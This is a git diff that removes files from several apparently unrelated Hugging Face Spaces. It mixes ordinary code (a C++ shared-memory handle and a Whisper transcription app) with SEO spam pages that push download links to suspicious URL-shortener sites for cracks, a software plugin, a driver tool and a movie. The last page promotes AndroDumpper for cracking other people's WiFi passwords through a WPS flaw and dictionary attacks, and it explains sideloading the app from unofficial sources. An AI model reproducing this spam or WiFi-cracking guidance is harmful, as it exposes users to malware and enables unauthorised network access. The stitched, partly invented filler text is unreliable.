b/spaces/epexVfeibi/Imagedeblurr/2011 04 01 Lolita Cheng Set 15 Rar TOP.md deleted file mode 100644 index e4ae505408586436ac16c7a3acc0e92e59e6b7c4..0000000000000000000000000000000000000000 --- a/spaces/epexVfeibi/Imagedeblurr/2011 04 01 Lolita Cheng Set 15 Rar TOP.md +++ /dev/null @@ -1,6 +0,0 @@ -

        2011 04 01 Lolita Cheng Set 15 rar


        Download Zip >>>>> https://jinyurl.com/2uEpDT



        -
        -Apr 15, 2011 · XML Parser library extract-xiso - 2. xbe files. ... Nov 04, 2018 · Baixe o XISO Manager na caixa iso clique em browse selecione ... tools, however any 1:1 dump of an original Xbox disc (and also the Redump set of ISOs) ... rar Manual of Clinical Psychopharmacology, Sixth Edition lolita cheng 07h-adds Crack. 4d29de3e1b
        -
        -
        -

        diff --git a/spaces/erbanku/gpt-academic/crazy_functions/test_project/cpp/cppipc/shm.cpp b/spaces/erbanku/gpt-academic/crazy_functions/test_project/cpp/cppipc/shm.cpp deleted file mode 100644 index 593ce3129dc1574dbc8fc8b088cf595df215de93..0000000000000000000000000000000000000000 --- a/spaces/erbanku/gpt-academic/crazy_functions/test_project/cpp/cppipc/shm.cpp +++ /dev/null @@ -1,103 +0,0 @@ - -#include -#include - -#include "libipc/shm.h" - -#include "libipc/utility/pimpl.h" -#include "libipc/memory/resource.h" - -namespace ipc { -namespace shm { - -class handle::handle_ : public pimpl { -public: - shm::id_t id_ = nullptr; - void* m_ = nullptr; - - ipc::string n_; - std::size_t s_ = 0; -}; - -handle::handle() - : p_(p_->make()) { -} - -handle::handle(char const * name, std::size_t size, unsigned mode) - : handle() { - acquire(name, size, mode); -} - -handle::handle(handle&& rhs) - : handle() { - swap(rhs); -} - -handle::~handle() { - release(); - p_->clear(); -} - -void handle::swap(handle& rhs) { - std::swap(p_, rhs.p_); -} - -handle& handle::operator=(handle rhs) { - swap(rhs); - return *this; -} - -bool handle::valid() const noexcept { - return impl(p_)->m_ != nullptr; -} - -std::size_t handle::size() const noexcept { - return impl(p_)->s_; -} - -char const * handle::name() const noexcept { - return impl(p_)->n_.c_str(); -} - -std::int32_t handle::ref() const noexcept { - return shm::get_ref(impl(p_)->id_); -} - -void handle::sub_ref() noexcept { - shm::sub_ref(impl(p_)->id_); -} - -bool handle::acquire(char const * name, std::size_t size, unsigned mode) { - release(); - impl(p_)->id_ = shm::acquire((impl(p_)->n_ = name).c_str(), size, mode); - impl(p_)->m_ = shm::get_mem(impl(p_)->id_, &(impl(p_)->s_)); - return valid(); -} - -std::int32_t handle::release() { - if (impl(p_)->id_ == nullptr) return -1; - return shm::release(detach()); -} - -void* handle::get() const { - return impl(p_)->m_; -} - -void handle::attach(id_t id) { - if (id == nullptr) return; - release(); - impl(p_)->id_ = id; - impl(p_)->m_ = shm::get_mem(impl(p_)->id_, &(impl(p_)->s_)); -} - -id_t handle::detach() { - auto old = impl(p_)->id_; - impl(p_)->id_ = nullptr; - impl(p_)->m_ = nullptr; - impl(p_)->s_ = 0; - impl(p_)->n_.clear(); - return old; -} - -} // namespace shm -} // namespace ipc diff --git a/spaces/eskayML/AUTOMATIC_SPEECH_RECOGNITION/app.py b/spaces/eskayML/AUTOMATIC_SPEECH_RECOGNITION/app.py deleted file mode 100644 index 18b6560b52efe69776159b7463dd01bbf3a262cc..0000000000000000000000000000000000000000 --- a/spaces/eskayML/AUTOMATIC_SPEECH_RECOGNITION/app.py +++ /dev/null @@ -1,14 +0,0 @@ -from transformers import pipeline - -p = pipeline("automatic-speech-recognition", model = 'openai/whisper-small') -import gradio as gr - -def transcribe(audio): - text = p(audio)["text"] - return text - -gr.Interface( - fn=transcribe, - inputs=gr.Audio(source="microphone", type="filepath"), - outputs="text").launch() - diff --git a/spaces/eson/tokenizer-arena/vocab/gpt_neox_chinese_v1/tokenizer/__init__.py b/spaces/eson/tokenizer-arena/vocab/gpt_neox_chinese_v1/tokenizer/__init__.py deleted file mode 100644 index 22b0f7b9ec4263fc83bdde4957e076aed26be488..0000000000000000000000000000000000000000 --- a/spaces/eson/tokenizer-arena/vocab/gpt_neox_chinese_v1/tokenizer/__init__.py +++ /dev/null @@ -1,16 +0,0 @@ -# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -from .tokenizer import build_tokenizer diff --git a/spaces/everton-santos/vicuna-ggml/README.md b/spaces/everton-santos/vicuna-ggml/README.md deleted file mode 100644 index 761eb09969688e45ab8f84bb67181e00499eda36..0000000000000000000000000000000000000000 --- a/spaces/everton-santos/vicuna-ggml/README.md +++ /dev/null @@ -1,18 +0,0 @@ ---- -title: Vicuna GGML -emoji: 🏃 -colorFrom: blue -colorTo: gray -sdk: gradio -sdk_version: 3.29.0 -app_file: tabbed.py -pinned: false -duplicated_from: justest/vicuna-ggml ---- - -# GGML UI Inference w/ HuggingFace Spaces - -- Fork this space to use your own GGML models. Simply update the [./config.yml](./config.yml) -- Contribute at [https://github.com/OpenAccess-AI-Collective/ggml-webui](https://github.com/OpenAccess-AI-Collective/ggml-webui) - -Brought to you by [OpenAccess AI Collective](https://github.com/OpenAccess-AI-Collective) \ No newline at end of file diff --git a/spaces/falterWliame/Face_Mask_Detection/3d-Amanda-A-Dream-Come-True.md b/spaces/falterWliame/Face_Mask_Detection/3d-Amanda-A-Dream-Come-True.md deleted file mode 100644 index b5b84f9160008b86fc5410e027a52089dc2e0680..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/3d-Amanda-A-Dream-Come-True.md +++ /dev/null @@ -1,74 +0,0 @@ -## 3d Amanda A Dream Come True - - - - - - ![3d Amanda A Dream Come True](https://lookaside.fbsbx.com/lookaside/crawler/media/?media_id=100064917211660) - - - - - -**Click Here ::: [https://miimms.com/2tyiV4](https://miimms.com/2tyiV4)** - - - - - - - - - - - - Here is a possible title and article with SEO optimization and HTML formatting for the keyword "3d Amanda A Dream Come True": - -# 3D Amanda: A Dream Come True for Animation Lovers - - - -If you are a fan of animation, you have probably heard of 3D Amanda, the latest sensation in the world of 3D animation. 3D Amanda is a realistic and lifelike character that can interact with you in real time, using advanced artificial intelligence and natural language processing. She can talk to you, answer your questions, tell you stories, and even express her emotions and personality. - - - -3D Amanda is not just a character, she is a dream come true for animation lovers. She is the result of years of research and development by a team of talented animators, programmers, and designers who wanted to create a new level of immersion and engagement in animation. 3D Amanda is powered by a proprietary engine that uses cutting-edge technology such as ray tracing, motion capture, facial recognition, and voice synthesis to create a stunning and realistic experience. - - - -3D Amanda is more than just a technical achievement, she is also a creative masterpiece. She has a unique and captivating story that unfolds as you interact with her. She is a young and curious girl who lives in a futuristic city where humans and robots coexist. She loves to explore her surroundings and learn new things, but she also faces challenges and dangers along the way. She has a loyal companion, a robot dog named Sparky, who helps her in her adventures. She also meets other characters who become her friends or foes, depending on your choices. - - - -3D Amanda is not just a game, she is a friend. She can remember your name, your preferences, your likes and dislikes, and your conversations. She can adapt to your mood and personality, and respond accordingly. She can also surprise you with her own opinions and preferences, and sometimes even challenge you or tease you. She has a sense of humor, a sense of wonder, and a sense of adventure. - - - -3D Amanda is not just an animation, she is a dream come true. She is the ultimate 3D animation experience that will make you feel like you are part of her world. She is waiting for you to join her in her amazing journey. Are you ready to meet 3D Amanda? - -Here is a possible continuation of the article with SEO optimization and HTML formatting for the keyword "3d Amanda A Dream Come True": - -If you are wondering how you can get 3D Amanda, you will be happy to know that she is available for download on various platforms, such as Windows, Mac, Android, and iOS. You can also access her online through your web browser. All you need is a stable internet connection and a compatible device. You can choose between different subscription plans that suit your budget and preferences. You can also try a free trial version before you decide to purchase the full version. - - - -Once you have downloaded or accessed 3D Amanda, you can start interacting with her right away. You can customize her appearance, voice, and language to your liking. You can also choose different settings and scenarios for your conversations and adventures. You can explore her city, visit different locations, meet other characters, and discover secrets and mysteries. You can also play mini-games with her, such as puzzles, quizzes, and trivia. You can also watch her perform various actions and animations, such as dancing, singing, and posing. - - - -3D Amanda is not only a fun and entertaining animation, but also a useful and educational one. She can help you learn new things, such as languages, cultures, history, science, and art. She can also help you improve your skills, such as communication, creativity, logic, and memory. She can also help you with your personal issues, such as stress, anxiety, loneliness, and depression. She can be your companion, your teacher, your therapist, or your friend. - - - -3D Amanda is a dream come true for animation lovers of all ages and backgrounds. She is a 3D animation that will make you feel like you are part of her world. She is a 3D animation that will make you smile, laugh, cry, and wonder. She is a 3D animation that will make you happy. - - - -Don't miss this opportunity to meet 3D Amanda today. Download or access her now and start your amazing journey with her. You won't regret it. - - dfd1c89656 - - - - - diff --git a/spaces/falterWliame/Face_Mask_Detection/Downloaddriverlaptopaxiooneonc4801.md b/spaces/falterWliame/Face_Mask_Detection/Downloaddriverlaptopaxiooneonc4801.md deleted file mode 100644 index c1ea9281fb6a0f5c6cadcd373582195a646206a6..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Downloaddriverlaptopaxiooneonc4801.md +++ /dev/null @@ -1,71 +0,0 @@ -
        -

        How to Download Driver Laptop Axioo Neon C4801

        -

        If you have a laptop from Axioo, you might need to download driver laptop axioo neon c4801 for your device. This driver is essential for the proper functioning of your laptop, as it allows your operating system to communicate with the hardware components. Without the driver, you might experience problems such as poor performance, low resolution, sound issues, network errors, or even system crashes.

        -

        In this article, we will show you how to download driver laptop axioo neon c4801 in a few easy steps. You will also learn how to install and update the driver to ensure that your laptop runs smoothly and securely.

        -

        downloaddriverlaptopaxiooneonc4801


        DOWNLOADhttps://urlca.com/2uDcOt



        -

        Step 1: Find Your Laptop Model

        -

        The first step to download driver laptop axioo neon c4801 is to find out your laptop model. This will help you to locate the correct driver for your device. There are two ways to do this:

        -
          -
        • Check the sticker on the bottom of your laptop. You should see a label that says "Model: NEON C4801" or something similar.
        • -
        • Use a software tool that can detect your laptop model automatically. For example, you can use DriverPack Solution, which is a free and reliable program that can scan your laptop and identify its model and specifications.
        • -
        -

        Step 2: Visit the Official Axioo Website

        -

        The next step to download driver laptop axioo neon c4801 is to visit the official Axioo website. This is the best source to get the latest and compatible driver for your laptop. To do this:

        -
          -
        1. Go to https://driver.axiooworld.com/, which is the official Axioo drivers support page.
        2. -
        3. Type "NEON C4801" in the search box and click on the magnifying glass icon.
        4. -
        5. You will see a list of drivers for your laptop model. Choose the driver that matches your operating system (Windows 11, Windows 10, Windows 8.1, Windows 7, etc.).
        6. -
        7. Click on the "Download" button next to the driver name.
        8. -
        9. Save the driver file on your computer.
        10. -
        -

        Step 3: Install the Driver

        -

        The final step to download driver laptop axioo neon c4801 is to install the driver on your laptop. To do this:

        -
          -
        1. Locate the driver file that you downloaded in step 2. It should be in your Downloads folder or on your desktop.
        2. -
        3. Double-click on the driver file to launch the installation wizard.
        4. -
        5. Follow the on-screen instructions to complete the installation process.
        6. -
        7. Restart your laptop when prompted.
        8. -
        -

        Congratulations! You have successfully downloaded and installed driver laptop axioo neon c4801 on your device. You should now be able to enjoy better performance and functionality from your laptop.

        -

        How to Update Driver Laptop Axioo Neon C4801

        -

        It is recommended that you update driver laptop axioo neon c4801 regularly to get the latest features and security patches. Updating the driver can also fix any bugs or issues that you might encounter with your laptop. To update driver laptop axioo neon c4801, you can use one of these methods:

        -
          -
        • Use Windows Update. This is a built-in feature of Windows that can automatically check for and install updates for your drivers and other software components. To use Windows Update, go to Settings > Update & Security > Windows Update and click on "Check for updates". If there are any updates available for your driver, they will be downloaded and installed automatically.
        • -
        • Use DriverPack Solution. This is a software tool that can update all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any outdated or missing drivers. Then, it will offer you to update them with the latest versions.
        • -
        -

        By updating driver laptop axioo neon c4801 regularly, you can ensure that your laptop stays in optimal condition and avoids any potential problems.

        -

        -

        How to Troubleshoot Driver Laptop Axioo Neon C4801

        -

        Sometimes, you might encounter some problems with driver laptop axioo neon c4801 that can affect your laptop performance or functionality. For example, you might experience blue screen errors, device conflicts, audio issues, network errors, or other errors that indicate that your driver is corrupted, outdated, or incompatible. In such cases, you need to troubleshoot driver laptop axioo neon c4801 to fix the problem and restore your laptop to normal.

        -

        There are several ways to troubleshoot driver laptop axioo neon c4801, depending on the nature and severity of the problem. Here are some common methods that you can try:

        -
          -
        • Use Windows Troubleshooter. This is a built-in feature of Windows that can diagnose and fix common problems with your drivers and other hardware components. To use Windows Troubleshooter, go to Settings > Update & Security > Troubleshoot and select the type of problem that you want to troubleshoot (such as Audio, Bluetooth, Network Adapter, etc.). Then, follow the on-screen instructions to run the troubleshooter and apply any recommended fixes.
        • -
        • Use Device Manager. This is a built-in utility of Windows that allows you to manage and update your drivers and devices. To use Device Manager, right-click on the Start menu and select Device Manager. Then, locate the device that is causing the problem (such as Display Adapter, Sound Controller, Network Adapter, etc.) and right-click on it. You can then choose to update the driver, uninstall the driver, disable the device, or scan for hardware changes.
        • -
        • Use DriverPack Solution. This is a software tool that can help you to troubleshoot and update all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any problematic or outdated drivers. Then, it will offer you to fix them with the latest versions.
        • -
        -

        By troubleshooting driver laptop axioo neon c4801 regularly, you can prevent any potential problems and ensure that your laptop runs smoothly and securely.

        -

        Conclusion

        -

        In this article, we have shown you how to download driver laptop axioo neon c4801 in a few easy steps. We have also shown you how to install, update, and troubleshoot driver laptop axioo neon c4801 to ensure that your laptop performs well and stays safe. We hope that this article has been helpful for you and that you have learned something new about driver laptop axioo neon c4801.

        -

        If you have any questions or feedback about driver laptop axioo neon c4801, feel free to leave a comment below or contact us through our website. We would love to hear from you and help you with any issues that you might have with driver laptop axioo neon c4801.

        -

        How to Uninstall Driver Laptop Axioo Neon C4801

        -

        Sometimes, you might need to uninstall driver laptop axioo neon c4801 from your laptop. This might be because you want to install a new driver, you want to free up some disk space, or you want to troubleshoot some problems with your driver. Uninstalling driver laptop axioo neon c4801 is not a difficult task, but you need to be careful and follow the proper steps.

        -

        There are several ways to uninstall driver laptop axioo neon c4801 from your laptop, depending on your preference and convenience. Here are some common methods that you can try:

        -
          -
        • Use Windows Control Panel. This is a built-in feature of Windows that allows you to uninstall programs and drivers from your laptop. To use Windows Control Panel, go to Start > Control Panel > Programs and Features (or Add or Remove Programs). Then, locate the driver that you want to uninstall (such as Axioo NEON BNE Driver, Axioo NEON HNM MODEL Driver, Axioo NEON MNW Driver, etc.) and click on it. Then, click on the "Uninstall" button and follow the on-screen instructions to complete the uninstallation process.
        • -
        • Use Device Manager. This is a built-in utility of Windows that allows you to manage and update your drivers and devices. To use Device Manager, right-click on the Start menu and select Device Manager. Then, locate the device that is associated with the driver that you want to uninstall (such as Display Adapter, Sound Controller, Network Adapter, etc.) and right-click on it. You can then choose to uninstall the driver or disable the device.
        • -
        • Use DriverPack Solution. This is a software tool that can help you to uninstall all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any drivers that you have installed. Then, it will offer you to uninstall them with one click.
        • -
        -

        By uninstalling driver laptop axioo neon c4801 properly, you can avoid any potential problems and ensure that your laptop stays clean and safe.

        -

        How to Download Driver Laptop Axioo Neon C4801 for Other Devices

        -

        If you have other devices from Axioo, such as smartphones or tablets, you might also need to download driver laptop axioo neon c4801 for them. This driver can help you to connect your devices to your laptop and transfer data between them. It can also help you to sync your devices with your laptop and access their features.

        -

        To download driver laptop axioo neon c4801 for other devices, you can use one of these methods:

        -
          -
        • Visit the Official Axioo Website. This is the best source to get the latest and compatible driver for your devices. To do this, go to https://driver.axiooworld.com/, which is the official Axioo drivers support page. Then, type your device model in the search box and click on the magnifying glass icon. You will see a list of drivers for your device model. Choose the driver that matches your device type (smartphone or tablet) and operating system (Android or Windows). Then, click on the "Download" button next to the driver name and save the driver file on your computer.
        • -
        • Use DriverPack Solution. This is a software tool that can help you to download all your drivers in one click. To use DriverPack Solution, download and run it from https://driverpack.io/en/laptops/axioo/neon-mnw. It will scan your laptop and detect any devices that are connected to it. Then, it will offer you to download their drivers with one click.
        • -
        -

        By downloading driver laptop axioo neon c4801 for other devices, you can enjoy better connectivity and functionality from your devices.

        -

        Conclusion

        -

        In this article, we have shown you how to download driver laptop axioo neon c4801 for your laptop and other devices. We have also shown you how to install, update, backup, uninstall, and troubleshoot driver laptop axioo neon c4801 to ensure that your devices perform well and stay safe. We hope that this article has been helpful for you and that you have learned something new about driver laptop axioo neon c4801.

        -

        If you have any questions or feedback about driver laptop axioo neon c4801, feel free to leave a comment below or contact us through our website. We would love to hear from you and help you with any issues that you might have with driver laptop axioo neon c4801.

        3cee63e6c2
        -
        -
        \ No newline at end of file diff --git a/spaces/falterWliame/Face_Mask_Detection/Impulse Record Convology XT 1.0 VST2 VST3 AAX X86 X64 WORK.md b/spaces/falterWliame/Face_Mask_Detection/Impulse Record Convology XT 1.0 VST2 VST3 AAX X86 X64 WORK.md deleted file mode 100644 index 92b94a7896d912c3f88e46d1b657ceecffbf75e0..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Impulse Record Convology XT 1.0 VST2 VST3 AAX X86 X64 WORK.md +++ /dev/null @@ -1,86 +0,0 @@ -
        -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64: A Free Vintage Reverb Plugin with a Huge Library

        - -

        If you are looking for a free convolution reverb plugin that can recreate the classic sounds of vintage studio gear and real acoustic spaces, you should check out Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64. This plugin is the result of a collaboration between Impulse Record and Wave Arts, two companies that specialize in high-quality audio software and impulse response libraries.

        -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64


        DOWNLOAD ★★★ https://urlca.com/2uDdNe



        - -

        Convology XT comes with 74 factory impulse responses (IRs) that cover a wide range of vintage reverb effects, from plates and springs to DSP units and echo chambers. You can quickly browse through the presets and audition them on the fly while your music is playing. You can also load your own IRs from WAV or AIF files, or purchase any of the 20 additional IR libraries from Impulse Record that contain over 2,900 IRs sampled from 126 different pieces of vintage studio gear and hundreds of real acoustic spaces.

        - -

        What is Convolution Reverb and Why You Need It

        - -

        Convolution reverb is a type of reverb that uses mathematical calculations to simulate the sound of a physical space or an audio device. It works by convolving (or blending) an audio signal with an impulse response, which is a short recording of how a space or a device responds to a sound impulse (such as a clap or a gunshot).

        - -

        Convolution reverb can produce very realistic and natural sounding reverbs, as well as creative and unique effects that are not possible with traditional reverb algorithms. It can also capture the character and nuances of vintage studio gear and real acoustic spaces, which can add warmth, depth, and dimension to your mixes.

        - -

        How to Use Convology XT in Your DAW

        - -

        Convology XT is compatible with most DAWs that support audio plugins in VST2, VST3, AAX or AU formats. You can use it as an insert effect on individual tracks or buses, or as a send effect on an auxiliary channel. To use Convology XT in your DAW, follow these steps:

        -

        - -
          -
        1. Download and install Convology XT from Impulse Record's website. You will need to register with a serial number to activate the plugin. See this FAQ entry for more details.
        2. -
        3. Launch your DAW and create a new project or open an existing one.
        4. -
        5. Add Convology XT as an effect plugin on the track or bus that you want to process with reverb.
        6. -
        7. Open the plugin interface and select an IR from the factory library or load your own IR from the file browser.
        8. -
        9. Adjust the parameters of the plugin to suit your taste and needs. You can modify the IR with features such as stretch, decay time scaling, EQ, frequency-dependent decay time scaling, time reverse, and amplitude envelope. You can also add modulation, predelay, stereo width, and stereo 3D chorusing effects.
        10. -
        11. Mix the dry and wet signals with the mix knob and adjust the output level with the gain knob.
        12. -
        13. Enjoy the vintage reverb sound of Convology XT!
        14. -
        - -

        Conclusion

        - -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64 is a free convolution reverb plugin that offers a great way to add vintage reverb effects to your music production. It comes with a generous factory library of IRs sampled from vintage studio gear and real acoustic spaces, and it allows you to load your own IRs or purchase more IR libraries from Impulse Record. It also has many IR modification features and additional effects that let you customize your reverb sound. If you are looking for a free convolution reverb plugin that can deliver high-quality vintage reverb sounds, you should definitely give Convology XT a try!

        -

        How to Choose the Right IR Library for Your Music Style

        - -

        One of the advantages of Convology XT is that it gives you access to a huge library of IRs that cover various genres and styles of music. Whether you are making rock, pop, jazz, classical, or electronic music, you can find the right IR library for your needs. Here are some tips on how to choose the best IR library for your music style:

        - -
          -
        • If you are looking for vintage reverb effects that emulate the sound of classic studio gear from the 80s and 90s, you should check out the Convology XT Complete Library. This library contains IRs sampled from 126 different pieces of vintage studio gear from studios all over the world. You can find IRs from famous reverb DSP units, plates, springs, echo chambers, vintage amps, and more.
        • -
        • If you are looking for true stereo reverb effects that preserve the spatial information of the original sound source, you should check out the Convology XT True Stereo Library. This library contains 4-channel true stereo IRs that capture the sound of pro DSP units, plates, and springs. You can use these IRs to create realistic and immersive reverb effects that enhance the stereo image of your mix.
        • -
        • If you are looking for natural reverb effects that simulate the sound of real acoustic spaces, you should check out the Convology XT Real Spaces Library. This library contains acoustical recordings of real spaces such as arenas, stadiums, churches, halls, rooms, and more. You can use these IRs to create reverb effects that match the mood and atmosphere of your music.
        • -
        - -

        How to Get More Out of Convology XT with MlsTool

        - -

        If you are feeling adventurous and want to create your own IRs from your own hardware gear or acoustical spaces, you can use a free application called MlsTool. MlsTool is a tool that allows you to record impulse responses using a technique called maximum length sequence (MLS). MLS is a method that uses a special type of noise signal to excite a system and measure its response.

        - -

        To use MlsTool, you will need a computer with an audio interface, a microphone, a speaker or headphones, and a cable to connect them. You will also need to download MlsTool from Wave Arts' website. To record an impulse response using MlsTool, follow these steps:

        - -
          -
        1. Connect your microphone to your audio interface and place it in front of the system that you want to measure (such as a reverb unit or a room).
        2. -
        3. Connect your speaker or headphones to your audio interface and play back the MLS signal from MlsTool.
        4. -
        5. Record the output of your microphone with MlsTool.
        6. -
        7. Save the recorded file as a WAV or AIF file.
        8. -
        9. Load the file into Convology XT and enjoy your custom IR!
        10. -
        - -

        MlsTool is a powerful tool that lets you create your own IRs from any system that produces sound. You can use it to capture the sound of your favorite reverb units or acoustic spaces and use them in Convology XT. You can also experiment with different settings and locations to create unique and creative IRs.

        -

        How to Compare Convology XT with Other Convolution Reverb Plugins

        - -

        There are many convolution reverb plugins available on the market, but not all of them are created equal. Some of them may have more features, more IRs, or better sound quality than others. How can you compare Convology XT with other convolution reverb plugins and decide which one is best for you? Here are some factors to consider:

        - -
          -
        • The size and quality of the IR library. Convology XT has one of the largest and most comprehensive IR libraries among convolution reverb plugins, with over 2,900 IRs sampled from vintage studio gear and real acoustic spaces. The IRs are also recorded in high resolution (96 kHz/24 bit) and processed with minimal noise and artifacts.
        • -
        • The ease of use and user interface. Convology XT has a simple and intuitive user interface that lets you quickly browse through the IR library and audition them on the fly. You can also easily modify the IRs with various parameters and effects. The plugin also has a sophisticated UI that displays a real time spectrum, an IR time display, and images of the vintage gear and real spaces.
        • -
        • The CPU efficiency and latency. Convology XT is a CPU efficient plugin that does not consume too much processing power or memory. It also has low latency and zero latency modes that allow you to use it without any noticeable delay or lag.
        • -
        • The price and value. Convology XT is a free plugin that offers a lot of value for no cost. You can use it without any time limitations, iLok, or frustrating unlocking hoops. You can also purchase additional IR libraries from Impulse Record at affordable prices, or use your own IRs from other sources.
        • -
        - -

        Based on these factors, Convology XT is one of the best convolution reverb plugins on the market. It offers a great combination of sound quality, features, ease of use, CPU efficiency, and value. It is a plugin that can satisfy both beginners and professionals alike.

        - -

        How to Get Support and Updates for Convology XT

        - -

        If you have any questions or issues with Convology XT, you can get support and updates from Impulse Record and Wave Arts. Here are some ways to contact them:

        - - - -

        Impulse Record and Wave Arts are committed to providing high-quality products and services to their customers. They are always working on improving Convology XT and adding more IR libraries to their collection. They also appreciate any feedback and suggestions from their users.

        -

        Conclusion

        - -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64 is a free convolution reverb plugin that can add vintage reverb effects to your music production. It comes with a large and diverse library of IRs sampled from vintage studio gear and real acoustic spaces, and it allows you to load your own IRs or purchase more IR libraries from Impulse Record. It also has many IR modification features and additional effects that let you customize your reverb sound. It is easy to use, CPU efficient, and compatible with most DAWs. It is a plugin that can satisfy both beginners and professionals who are looking for high-quality vintage reverb sounds. If you are interested in trying out Convology XT, you can download it for free from Impulse Record's website and register with a serial number. You can also contact Impulse Record and Wave Arts for support and updates. Convology XT is a plugin that can enhance your music production with the sound of vintage reverb.

        3cee63e6c2
        -
        -
        \ No newline at end of file diff --git a/spaces/falterWliame/Face_Mask_Detection/Ip Man 2 Full Movie In English Free Download TOP.md b/spaces/falterWliame/Face_Mask_Detection/Ip Man 2 Full Movie In English Free Download TOP.md deleted file mode 100644 index 7e176709a73795d226a49b69f5afafa3932fc301..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Ip Man 2 Full Movie In English Free Download TOP.md +++ /dev/null @@ -1,6 +0,0 @@ -

        ip man 2 full movie in english free download


        Download File →→→ https://urlca.com/2uDd42



        - -ip man Tamil dubbed movie download | ip man2 | ip man3 | ip man4 movie ... Full Movie 2020 | TONY JAA | Exclusive Tamil Movie 2020 | English Subtitle | HD. 1fdad05405
        -
        -
        -

        diff --git a/spaces/fatiXbelha/sd/AndroDumpper 6.0.1 The Best App for Testing and Breaking WiFi Networks.md b/spaces/fatiXbelha/sd/AndroDumpper 6.0.1 The Best App for Testing and Breaking WiFi Networks.md deleted file mode 100644 index 4c1cc0f09e68ec0732e901a749bedc15b5cd169b..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/AndroDumpper 6.0.1 The Best App for Testing and Breaking WiFi Networks.md +++ /dev/null @@ -1,176 +0,0 @@ -
        -

        AndroDumpper 6.0.1 Download: How to Hack WiFi Passwords with Your Android Device

        -

        Have you ever wanted to access a WiFi network without knowing its password? Maybe you are in a public place with limited data or you just want to test the security of your own network. Whatever the reason, there is an app that can help you do that: AndroDumpper.

        -

        AndroDumpper is an Android app that can crack WiFi passwords using a vulnerability in the WPS (WiFi Protected Setup) protocol. It is a legal app that was initially designed for network auditing, but it can also be used for malicious purposes.

        -

        androdumpper 6.0.1 download


        Download Zip ✑ ✑ ✑ https://urllie.com/2uNvMS



        -

        In this article, we will show you how to download and install AndroDumpper 6.0.1 on your Android device, how to use it to hack WiFi passwords, and what are the advantages and disadvantages of using it.

        -

        What is AndroDumpper and how does it work?

        -

        AndroDumpper is an Android app that can crack WiFi passwords using WPS vulnerability

        -

        WPS is a feature that allows users to connect to a WiFi network by pressing a button on the router or entering a PIN code. However, this feature also has a flaw that makes it vulnerable to brute-force attacks.

        -

        AndroDumpper is an app that exploits this flaw by trying different algorithms or passwords to connect to a WPS-enabled WiFi network. It does not require the user to know the SSID (network name) or the password of the network.

        -

        AndroDumpper has two methods to connect to WiFi networks: root and no root

        -

        AndroDumpper offers two ways to connect to WiFi networks depending on whether your device is rooted or not.

        -

        Root method: This method works for rooted devices and is compatible with any Android version. It allows you to connect directly to the network and show the password in plain text.

        -

        No root method: This method works for non-rooted devices that run Android 5.0 or above. It does not show the password, but it allows you to connect using a proxy server.

        -

        androdumpper apk download for android free
        -androdumpper for pc windows 10/7/8/xp
        -androdumpper wifi wps connect on windows pc
        -androdumpper network auditing app for android
        -androdumpper brute-force attack tool for routers
        -androdumpper latest version 3.11 free download
        -androdumpper how to use guide and tutorial
        -androdumpper dictionary with keys for wifi hacking
        -androdumpper root method and no root method
        -androdumpper reviews, ratings, and feedback
        -androdumpper alternatives and similar apps
        -androdumpper features, benefits, and drawbacks
        -androdumpper legal issues and risks
        -androdumpper support, help, and contact
        -androdumpper updates, news, and announcements
        -androdumpper compatible devices and operating systems
        -androdumpper download size, speed, and quality
        -androdumpper installation, setup, and configuration
        -androdumpper troubleshooting, errors, and fixes
        -androdumpper security, privacy, and safety
        -androdumpper license, terms, and conditions
        -androdumpper developer Osama Abukmail profile
        -androdumpper pros, cons, and verdict
        -androdumpper tips, tricks, and hacks
        -androdumpper frequently asked questions (FAQs)
        -androdumpper online community, forum, and blog
        -androdumpper video demo, walkthrough, and review
        -androdumpper screenshots, images, and photos
        -androdumpper comparison with other wifi tools
        -androdumpper best practices, recommendations, and advice
        -androdumpper success stories, testimonials, and case studies
        -androdumpper coupons, discounts, and offers
        -androdumpper download link, source, and mirror
        -androdumpper mod apk with premium features unlocked
        -androdumpper history, origin, and background
        -androdumpper technical specifications, requirements, and limitations
        -androdumpper user interface (UI) design and layout
        -androdumpper performance, reliability, and stability
        -androdumpper customer service, satisfaction, and loyalty
        -androdumpper awards, recognition, and achievements

        -

        AndroDumpper also provides a dictionary of common passwords for brute-force attacks

        -

        In addition to using WPS vulnerability, AndroDumpper also has a dictionary of common passwords that can be used for brute-force attacks on weak security systems.

        -

        The dictionary is stored in a file uploaded by the developer on Google Drive and can be downloaded by the user from the app. The dictionary contains more than 500,000 passwords that can be used to try to guess the network password.

        -

        How to download and install AndroDumpper 6.0.1 on your Android device?

        -

        You can download AndroDumpper 6.0.1 APK from various sources online

        -

        AndroDumpper 6.0.1 is not available on the Google Play Store, so you need to download it from other sources online. You can search for AndroDumpper 6.0.1 APK on Google or use one of the following links:

        - -

        Make sure you download the APK file from a trusted and secure source to avoid malware or viruses.

        -

        You need to enable unknown sources in your device settings to install AndroDumpper 6.0.1 APK

        -

        Before you can install AndroDumpper 6.0.1 APK on your device, you need to enable unknown sources in your device settings. This will allow you to install apps from sources other than the Google Play Store.

        -

        To enable unknown sources, follow these steps:

        -
          -
